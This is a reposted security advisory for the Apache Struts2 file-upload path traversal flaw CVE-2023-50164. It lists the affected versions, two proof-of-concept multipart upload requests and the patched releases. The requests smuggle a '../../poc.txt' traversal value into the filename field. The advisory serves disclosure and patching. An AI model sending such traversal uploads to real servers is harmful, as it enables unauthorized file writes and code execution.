Vulnerability description:
Apache Struts2Is an open source web application architecture for developing Java EE web applications. It utilizes and extends the Java Servlet API and encourages developers to adopt the MVC architecture. Apache has issued a security warning that there is a serious security flaw in the Struts 2 open source web application framework, which can causeremote code execution. The vulnerability number isCVE-2023-50164, rooted in the defective "File upload logic”, which may result in unauthorizedpath traversal, and upload malicious files and achieve arbitrary code execution when exploited.
Impact of the vulnerability:
2.5.0 <= Struts <= 2.5.32
6.0.0 <= Struts <= 6.3.0
Vulnerability proof:
POC one:
——WebKitFormBoundary5WJ61X4PRwyYKlip
Content-Disposition: form-data; name="Upload"; filename="poc.txt"
Content-Type: text/plain
test
——WebKitFormBoundary5WJ61X4PRwyYKlip
Content-Disposition: form-data; name="uploadFileName";
../../poc.txt
——WebKitFormBoundary5WJ61X4PRwyYKlip–
POC two:
POST /s2_066_war_exploded/upload.action?uploadFileName=../../poc.txt HTTP/1.1
Host: localhost:8080
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=—-WebKitFormBoundary5WJ61X4PRwyYKlip
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3; q=0.7
Content-Length: 593
——WebKitFormBoundary5WJ61X4PRwyYKlip
Content-Disposition: form-data; name="Upload"; filename="poc.txt"
Content-Type: text/plain
test
——WebKitFormBoundary5WJ61X4PRwyYKlip–
Bug fixes:
An official updateable version is available. Users are advised to update to a safe version as soon as possible:
Struts >= 2.5.33
Struts >= 6.3.0.2
Patch: https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7
refer to:
https://cwiki.apache.org/confluence/display/WW/S2-066
https://github.com/apache/struts/compare/STRUTS_6_3_0…STRUTS_6_3_0_2#files_bucket
https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7
https://trganda.github.io/notes/security/vulnerabilities/apache-struts/Apache-Struts-Remote-Code-Execution-Vulnerability-(-S2-066-CVE-2023-50164)
https://y4tacker.github.io/2023/12/09/year/2023/12/Apache-Struts2-File upload analysis-S2-066/
Original article by Chief Security Officer, if reproduced, please credit https://cncso.com/en/new-critical-rce-vulnerability-discovered-in-apache-struts2-html